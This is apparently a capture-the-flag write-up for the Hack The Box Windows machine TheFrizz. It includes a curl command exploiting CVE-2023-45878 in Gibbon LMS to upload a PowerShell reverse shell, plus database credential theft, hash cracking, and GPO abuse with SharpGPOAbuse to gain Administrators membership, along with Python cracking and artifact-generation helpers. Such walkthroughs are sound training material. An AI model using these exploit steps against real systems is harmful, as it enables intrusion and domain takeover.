Hackthebox: TheFrizz

Foued SAIDI

Overview

TheFrizz is a medium-difficulty Windows machine from Hack The Box. Initial access comes from CVE-2023-45878, an unauthenticated arbitrary file upload in Gibbon LMS that gives us RCE as the web-service account. Database credentials from the Gibbon config lead to a crackable hash for the first domain user, whose Recycle Bin holds an archive with the next user's password. That user can create GPOs and link them to the Domain Controllers OU, which we abuse to add ourselves to the Administrators group on the DC.

TheFrizz-info-card

Reconnaissance

PORT     STATE SERVICE       VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-21 02:25:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022
Aggressive OS guesses: Microsoft Windows Server 2022 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-08-21T02:25:59
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h35m12s

Kerberos on 88 together with LDAP (389/636/3268/3269) and DNS tells us this is an Active Directory domain controller for frizz.htb, and the HTTP redirect gives us the hostname frizzdc.frizz.htb. Let's add entries for frizz.htb and frizzdc.frizz.htb to our /etc/hosts file. Also note the 6h35m clock skew reported by the SMB script; it will matter as soon as we start using Kerberos.

Web Application - http://frizzdc.frizz.htb

Moving on to the web app, it has a few interesting functions, notably a staff login:

Web Application

Further down the page we can see it runs Gibbon v25.0.00.

A quick search turns up CVE-2023-45878, an unauthenticated arbitrary file upload in Gibbon LMS affecting this version: modules/Rubrics/rubrics_visualise_saveAjax.php base64-decodes the img parameter and writes the result to whatever filename the path parameter names, under the web root and without any authentication, so dropping a PHP file gives RCE.

The PoC below first crafts a PHP reverse shell, then uploads and triggers it:

┌──(kali㉿kali)-[~]
└─$ cat shell.php
<?php echo system('powershell -e <base64 UTF-16LE encoded PowerShell reverse shell>')?>


┌──(kali㉿kali)-[~]
└─$ curl -X POST http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php -d "img=image/png;shell,$(cat shell.php | base64 -w0)" -d 'path=shell.php' -d 'gibbonPersonID=0000000001' && curl http://frizzdc.frizz.htb/Gibbon-LMS/shell.php &
shell.php[1] 16075

And we get our callback:

┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.85] from (UNKNOWN) [10.10.11.60] 54349

PS C:\xampp\htdocs\Gibbon-LMS> whoami
frizz\w.webservice
PS C:\xampp\htdocs\Gibbon-LMS>

As usual, the first thing to do on a fresh web shell is to harvest database credentials from the application config, and Gibbon's config.php delivers:

PS C:\xampp\htdocs\Gibbon-LMS> cat config.php
<?php
/*
Gibbon, Flexible & Open School System
Copyright (C) 2010, Ross Parker

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/

/**
* Sets the database connection information.
* You can supply an optional $databasePort if your server requires one.
*/
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';

/**
* Sets a globally unique id, to allow multiple installs on a single server.
*/
$guid = '7y59n5xz-uym-ei9p-7mmq-83vifmtyey2';

/**
* Sets system-wide caching factor, used to balance performance and freshness.
* Value represents number of page loads between cache refresh.
* Must be positive integer. 1 means no caching.
*/
$caching = 10;
PS C:\xampp\htdocs\Gibbon-LMS>

These let us query the Gibbon database directly for user hashes. Gibbon keeps them in gibbonPerson as passwordStrong, alongside a per-user passwordStrongSalt:

PS C:\xampp\htdocs\Gibbon-LMS> C:\xampp\mysql\bin\mysql.exe -u MrGibbonsDB -p'MisterGibbs!Parrot!?1' --database=gibbon -e "select username, passwordStrong,passwordStrongSalt from gibbonPerson;"
username passwordStrong passwordStrongSalt
f.frizzle 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 /aACFhikmNopqrRTVz2489
PS C:\xampp\htdocs\Gibbon-LMS>

We can now attempt to crack this with hashcat. Gibbon computes sha256(salt + password), which is mode 1420 (sha256($salt.$pass)) with the input in hash:salt form; rockyou gets a hit:

067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23
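To see exactly what hashcat mode 1420 does with that line, here is an added example (not from the writeup) that reimplements the construction in Python: sha256 over salt concatenated with the candidate password, hex-encoded, compared against the stored hash. It is handy for confirming a cracked password without hashcat, or for checking a candidate or two by hand. The wordlist in the main block is a constructed stand-in for rockyou; the hash and salt are the ones from the gibbonPerson row above.

```python
"""Gibbon password hashes: sha256(salt || password), i.e. hashcat -m 1420."""
import hashlib
from typing import Iterable, Optional, Tuple


def gibbon_hash(password: str, salt: str) -> str:
    """sha256(salt . password) as lowercase hex, the mode-1420 construction."""
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


def parse_hashcat_line(line: str) -> Tuple[str, str]:
    """Split the 'hash:salt' line hashcat -m 1420 expects.

    The hex digest never contains ':', so splitting on the first one is safe
    even if the salt itself contains ':'.
    """
    digest, salt = line.strip().split(":", 1)
    return digest, salt


def crack_1420(target_hash: str, salt: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose salted sha256 matches target_hash, else None."""
    target = target_hash.strip().lower()
    for cand in candidates:
        cand = cand.rstrip("\r\n")  # wordlist lines keep their newline
        if gibbon_hash(cand, salt) == target:
            return cand
    return None


if __name__ == "__main__":
    line = ("067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03"
            ":/aACFhikmNopqrRTVz2489")
    digest, salt = parse_hashcat_line(line)
    wordlist = ["password\n", "123456\n", "Jenni_Luvs_Magic23\n"]  # constructed
    print("cracked:", crack_1420(digest, salt, wordlist))
```

With hashcat itself the equivalent is `hashcat -m 1420 hash.txt rockyou.txt`, where hash.txt holds the single hash:salt line shown above.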

With a valid domain password we can SSH in. SSH here authenticates via Kerberos (GSSAPI), so we request a TGT with impacket, point KRB5CCNAME at it and let ssh use it with -K. Two things need to be in place first: the FRIZZ.HTB realm and its KDC in /etc/krb5.conf, and our clock within five minutes of the DC (nmap reported a skew of about 6.5 hours, so sync with ntpdate or wrap the commands in faketime):

impacket-getTGT frizz.htb/f.frizzle:'Jenni_Luvs_Magic23' -dc-ip frizzdc.frizz.htb
export KRB5CCNAME=f.frizzle.ccache
ssh [email protected] -K

As usual, we hunt for creds. The user's Recycle Bin holds something interesting. Each deleted item is stored as a pair: a $I file with the metadata (original path, size, deletion time) and a matching $R file with the content. The 30 MB $R archive is the one we want; after copying it to the profile directory as stuff.7z, we pull it back with scp:

PS C:\Users\f.frizzle> ls 'C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103'

Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/29/2024 7:31 AM 148 $IE2XMEG.7z
-a--- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z

PS C:\Users\f.frizzle>


└─$ scp [email protected]:c:/users/f.frizzle/stuff.7z .
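The $I file next to the archive is worth grabbing too: it records where the archive lived before deletion and when it was deleted (its own last-write time, 7:31 AM above, is the deletion time). The parser below is an added DFIR example, not from the writeup, for the Windows 10/11 $I layout (version 2): int64 version, int64 original size, int64 deletion FILETIME, int32 path length in UTF-16 code units including the NUL, then the UTF-16LE path. Version 1 (Vista to 8.1) uses a fixed 520-byte path field instead. The sample record is constructed with the writeup's stuff.7z name and size, not read from the real $IE2XMEG.7z; a real 148-byte v2 record implies a 59-character original path.

```python
"""Parse Windows Recycle Bin $I metadata records."""
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
V2_HEADER = "<qqqi"                          # version, size, FILETIME, path chars (incl. NUL)
V2_HEADER_LEN = struct.calcsize(V2_HEADER)   # 28 bytes
V1_PATH_BYTES = 520                          # v1: fixed 260-char UTF-16LE path field

SAMPLE_PATH = r"C:\Users\f.frizzle\stuff.7z"  # constructed, not the real deleted path


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME counts 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse of filetime_to_datetime, computed in integers to avoid float loss."""
    delta = dt.astimezone(timezone.utc) - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def parse_dollar_i(blob: bytes) -> dict:
    """Decode a $I record into its original path, size and deletion time."""
    version, size, ft = struct.unpack_from("<qqq", blob, 0)
    if version == 2:
        (nchars,) = struct.unpack_from("<i", blob, 24)
        raw = blob[V2_HEADER_LEN:V2_HEADER_LEN + 2 * nchars]
    elif version == 1:
        raw = blob[24:24 + V1_PATH_BYTES]
    else:
        raise ValueError(f"unsupported $I version {version}")
    path = raw.decode("utf-16-le").split("\x00", 1)[0]
    return {
        "version": version,
        "original_size": size,
        "deleted_at": filetime_to_datetime(ft),
        "original_path": path,
    }


def build_dollar_i(path: str, size: int, deleted_at: datetime) -> bytes:
    """Construct a v2 record; used here only to fabricate a sample for the parser."""
    raw = (path + "\x00").encode("utf-16-le")
    header = struct.pack(V2_HEADER, 2, size, datetime_to_filetime(deleted_at), len(path) + 1)
    return header + raw


def v2_path_chars_from_size(file_size: int) -> int:
    """Original path length (without NUL) implied by a v2 $I file's size."""
    return (file_size - V2_HEADER_LEN) // 2 - 1


def sample_blob() -> bytes:
    """Constructed record: stuff.7z, 30416987 bytes, deleted 2024-10-29 07:31 UTC."""
    return build_dollar_i(SAMPLE_PATH, 30416987,
                          datetime(2024, 10, 29, 7, 31, tzinfo=timezone.utc))


if __name__ == "__main__":
    print(parse_dollar_i(sample_blob()))
    print("a 148-byte $I implies a", v2_path_chars_from_size(148), "character original path")
```

On a live box the same parser runs over the bytes of C:\$RECYCLE.BIN\<SID>\$I<id> copied out with scp; the SID directory name tells you which account deleted the file.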

Inside the archive is a base64 string that decodes to a password for M.SchoolBus:

┌──(kali㉿kali)-[~/Desktop/wapt/conf]
└─$ echo 'IXN1QmNpZ0BNZWhUZWQhUgo=' | base64 -d
!suBcig@MehTed!R

We SSH in again as that user, with the same getTGT and ssh -K steps.

Hint: this new user has a bunch of abilities, but only one applies directly to the DC. Enumerating the domain and its OUs with PowerView points at the GPO links on the Domain Controllers OU:

PS C:\Users\M.SchoolBus> get-domain

Forest : frizz.htb
DomainControllers : {frizzdc.frizz.htb}
Children : {}
DomainMode : Unknown
DomainModeLevel : 7
Parent :
PdcRoleOwner : frizzdc.frizz.htb
RidRoleOwner : frizzdc.frizz.htb
InfrastructureRoleOwner : frizzdc.frizz.htb
Name : frizz.htb

PS C:\Users\M.SchoolBus> Get-DomainOU | select name, gplink

name gplink
---- ------
Domain Controllers [LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=frizz,DC=htb;0]
Class_Frizz

Since this user can create GPOs and link them to the Domain Controllers OU, we create one, link it, and have SharpGPOAbuse drop a Restricted Groups policy into its SYSVOL folder that adds M.SchoolBus to the Administrators group. The DC applies it on the next policy refresh, which we force with gpupdate:

PS C:\Users\M.SchoolBus> New-GPO -Name kujen | New-GPLink -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes

GpoId : 3b236518-30ed-4ea2-821b-90b0f32d1be7
DisplayName : kujen
Enabled : True
Enforced : False
Target : OU=Domain Controllers,DC=frizz,DC=htb
Order : 2

PS C:\Users\M.SchoolBus> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName kujen
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of M.SchoolBus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "kujen" is: {3B236518-30ED-4EA2-821B-90B0F32D1BE7}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{3B236518-30ED-4EA2-821B-90B0F32D1BE7}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Users\M.SchoolBus> gpupdate /force
Updating policy...



Computer Policy update has completed successfully.

User Policy update has completed successfully.



PS C:\Users\M.SchoolBus> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
M.SchoolBus
The command completed successfully.
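SharpGPOAbuse's output above lists exactly what it touched: a GptTmpl.inf under the GPO's Machine\Microsoft\Windows NT\SecEdit folder, the versionNumber attribute, and GPT.ini. The block below is an added example, not SharpGPOAbuse's code, that reproduces those three artifacts in Python so the mechanism is visible, and adds the check a defender would run over GptTmpl.inf files pulled from SYSVOL: any SID pushed into S-1-5-32-544 that is not on an allow-list. The CSE GUIDs and INF keys are the standard ones for the Security client-side extension; the member SID in the main block is M.SchoolBus's from the tool output, and the allow-list is constructed.

```python
"""Artifacts of a Restricted Groups 'add local admin' GPO edit, plus a detector."""
import re
from typing import Dict, List

ADMINISTRATORS_SID = "S-1-5-32-544"
# Client-side extension pair that makes the machine process the security template.
SECURITY_CSE = "{827D319E-6EAC-11D2-A4EA-00C04F79F83A}"
SECURITY_TOOL = "{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}"


def gpttmpl_add_local_admin(member_sid: str) -> str:
    """Security template that puts member_sid into BUILTIN\\Administrators.

    '__Members' is authoritative: every existing member not listed is removed.
    """
    return (
        "[Unicode]\r\nUnicode=yes\r\n"
        '[Version]\r\nsignature="$CHICAGO$"\r\nRevision=1\r\n'
        "[Group Membership]\r\n"
        f"*{ADMINISTRATORS_SID}__Memberof =\r\n"
        f"*{ADMINISTRATORS_SID}__Members = *{member_sid}\r\n"
    )


def bump_machine_version(version_number: int) -> int:
    """versionNumber packs the user version in the high 16 bits and the machine
    version in the low 16; a machine-side change increments only the low half."""
    user, machine = version_number >> 16, version_number & 0xFFFF
    return (user << 16) | ((machine + 1) & 0xFFFF)


def gpt_ini(version_number: int) -> str:
    """GPT.ini must carry the same number as the versionNumber attribute."""
    return f"[General]\r\nVersion={version_number}\r\n"


def register_security_cse(existing: str) -> str:
    """gPCMachineExtensionNames must list the Security CSE or the template is ignored."""
    entry = f"[{SECURITY_CSE}{SECURITY_TOOL}]"
    return existing if entry in existing else existing + entry


def parse_group_membership(inf_text: str) -> Dict[str, List[str]]:
    """Map group SID -> members from the [Group Membership] section of a GptTmpl.inf."""
    result: Dict[str, List[str]] = {}
    in_section = False
    for line in inf_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_section = line.lower() == "[group membership]"
            continue
        if not in_section:
            continue
        m = re.match(r"\*(S-[\d-]+)__Members\s*=\s*(.*)$", line)
        if m:
            members = [x.strip().lstrip("*") for x in m.group(2).split(",") if x.strip()]
            result[m.group(1)] = members
    return result


def unexpected_admins(inf_text: str, allowed_sids: List[str]) -> List[str]:
    """Detection: SIDs pushed into Administrators that are not on the allow-list."""
    members = parse_group_membership(inf_text).get(ADMINISTRATORS_SID, [])
    return [s for s in members if s not in allowed_sids]


if __name__ == "__main__":
    sid = "S-1-5-21-2386970044-1145388522-2932701813-1106"  # M.SchoolBus, per tool output
    inf = gpttmpl_add_local_admin(sid)
    print(inf)
    new_version = bump_machine_version(0)
    print(gpt_ini(new_version), register_security_cse(""))
    domain_admins = "S-1-5-21-2386970044-1145388522-2932701813-512"  # constructed allow-list
    print("flagged:", unexpected_admins(inf, [domain_admins]))
```

For detection, the same parser can be pointed at every Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf under \\frizz.htb\SysVol\frizz.htb\Policies; a Group Membership section in a freshly created GPO linked to the Domain Controllers OU is the signal here.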

And we are local admin now! Two caveats are worth knowing. First, a domain controller has no local SAM, so "local Administrators" here is the domain's BUILTIN\Administrators group, and this is a domain-wide change rather than a host-local one. Second, Restricted Groups "Members" is authoritative, which is why the listing above shows only Administrator and M.SchoolBus: Domain Admins and Enterprise Admins, which sit in that group by default on a DC, were removed by the policy. On a real engagement that is loud and destructive, and SharpGPOAbuse's startup-script or scheduled-task options are far less disruptive.

Our current SSH session still carries the old token, so the new membership does not apply to it and a fresh logon is needed. Let's grab the flags over SMB from Kali instead. Note that in smbclient -p is the port option, not the password, which is why the first attempt below only prompts; either type the password at the prompt, as in the second attempt, or pass it as -U 'M.SchoolBus%<password>':

┌──(kali㉿kali)-[~/Desktop/wapt/conf]
└─$ smbclient //frizzdc.frizz.htb/C$ -U M.SchoolBus -p '!suBcig@MehTed!R'
Password for [WORKGROUP\M.SchoolBus]:

┌──(kali㉿kali)-[~/Desktop/wapt/conf]
└─$ smbclient //frizzdc.frizz.htb/C$ -U M.SchoolBus
Password for [WORKGROUP\M.SchoolBus]:
Try "help" to get a list of possible commands.
smb: \> ls
$RECYCLE.BIN DHS 0 Tue Oct 29 14:31:09 2024
$WinREAgent DH 0 Mon Mar 10 22:31:22 2025
Config.Msi DHS 0 Thu Feb 20 22:51:26 2025
Documents and Settings DHSrn 0 Tue Oct 29 16:12:57 2024
DumpStack.log.tmp AHS 12288 Tue Oct 29 15:27:08 2024
inetpub D 0 Mon Mar 10 22:39:34 2025
PerfLogs D 0 Sat May 8 08:15:05 2021
Program Files DR 0 Wed Feb 26 16:13:49 2025
Program Files (x86) D 0 Sat May 8 09:34:13 2021
ProgramData DHn 0 Thu Feb 20 22:50:40 2025
Recovery DHSn 0 Tue Oct 29 16:12:59 2024
System Volume Information DHS 0 Tue Oct 29 14:25:07 2024
Users DR 0 Tue Oct 29 14:31:03 2024
Windows D 0 Mon Mar 10 22:41:41 2025
xampp D 0 Tue Oct 29 14:28:30 2024

3769343 blocks of size 4096. 366469 blocks available
smb: \> cd users
smb: \users\> ls
. DR 0 Tue Oct 29 14:31:03 2024
.. DHS 0 Mon Mar 10 22:39:34 2025
Administrator D 0 Tue Mar 11 22:37:09 2025
All Users DHSrn 0 Sat May 8 08:26:16 2021
Default DHR 0 Tue Oct 29 16:12:57 2024
Default User DHSrn 0 Sat May 8 08:26:16 2021
desktop.ini AHS 174 Sat May 8 08:14:03 2021
f.frizzle D 0 Sat Mar 22 18:24:37 2025
M.SchoolBus D 0 Sat Mar 22 19:04:40 2025
Public DR 0 Tue Oct 29 14:13:24 2024
v.frizzle D 0 Wed Feb 19 21:35:08 2025
w.Webservice D 0 Wed Feb 19 21:35:08 2025

3769343 blocks of size 4096. 366469 blocks available
smb: \users\> cd administrator
smb: \users\administrator\> ls
. D 0 Tue Mar 11 22:37:09 2025
.. DR 0 Tue Oct 29 14:31:03 2024
3D Objects DR 0 Tue Oct 29 14:13:24 2024
AppData DH 0 Fri Mar 21 22:26:23 2025
Application Data DHSrn 0 Tue Oct 29 14:13:18 2024
Contacts DR 0 Tue Oct 29 14:13:24 2024
Cookies DHSrn 0 Tue Oct 29 14:13:18 2024
Desktop DR 0 Wed Feb 26 21:53:05 2025
Documents DR 0 Wed Feb 26 16:13:49 2025
Downloads DR 0 Tue Oct 29 14:13:24 2024
Favorites DR 0 Tue Oct 29 14:13:24 2024
Links DR 0 Tue Oct 29 14:13:24 2024
Local Settings DHSrn 0 Tue Oct 29 14:13:18 2024
Music DR 0 Tue Oct 29 14:13:24 2024
My Documents DHSrn 0 Tue Oct 29 14:13:18 2024
NetHood DHSrn 0 Tue Oct 29 14:13:18 2024
NTUSER.DAT AHn 262144 Fri Mar 21 22:26:29 2025
ntuser.dat.LOG1 AHS 0 Tue Oct 29 14:13:18 2024
ntuser.dat.LOG2 AHS 99328 Tue Oct 29 14:13:18 2024
NTUSER.DAT{a220b2e4-9610-11ef-9ff5-0800273d0e9f}.TM.blf AHS 65536 Tue Oct 29 14:13:18 2024
NTUSER.DAT{a220b2e4-9610-11ef-9ff5-0800273d0e9f}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Tue Oct 29 14:13:18 2024
NTUSER.DAT{a220b2e4-9610-11ef-9ff5-0800273d0e9f}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Tue Oct 29 14:13:18 2024
ntuser.ini HS 20 Tue Oct 29 14:13:18 2024
Pictures DR 0 Tue Oct 29 14:13:24 2024
Recent DHSrn 0 Tue Oct 29 14:13:18 2024
Saved Games DR 0 Tue Oct 29 14:13:24 2024
Searches DR 0 Tue Oct 29 14:13:24 2024
SendTo DHSrn 0 Tue Oct 29 14:13:18 2024
Start Menu DHSrn 0 Tue Oct 29 14:13:18 2024
Templates DHSrn 0 Tue Oct 29 14:13:18 2024
Videos DR 0 Tue Oct 29 14:13:24 2024
3769343 blocks of size 4096. 366469 blocks available
smb: \users\administrator\> cd desktop
smb: \users\administrator\desktop\> ls
. DR 0 Tue Mar 11 23:14:03 2025
.. D 0 Tue Mar 11 22:37:09 2025
cleanup.ps1 A 2083 Tue Feb 25 22:06:47 2025
desktop.ini AHS 282 Tue Oct 29 14:13:24 2024
root.txt AR 34 Fri Mar 21 22:26:26 2025

3769343 blocks of size 4096. 366469 blocks available
smb: \users\administrator\desktop\> cat root.txt
cat: command not found
smb: \users\administrator\desktop\> get root.txt
getting file \users\administrator\desktop\root.txt of size 34 as root.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \users\administrator\desktop\> exit

┌──(kali㉿kali)-[~/Desktop/wapt/conf]
└─$ cat root.txt
d675dc327c0a22d4c5f82b5c378276bd

That was it for TheFrizz, I hope you learned something new!
-0xkujen

  • Title: Hackthebox: TheFrizz
  • Author: Foued SAIDI
  • Created at : 2025-08-20 22:45:24
  • Updated at : 2025-08-20 23:34:18
  • Link: https://kujen5.github.io/2025/08/20/Hackthebox-TheFrizz/
  • License: This work is licensed under CC BY-NC-SA 4.0.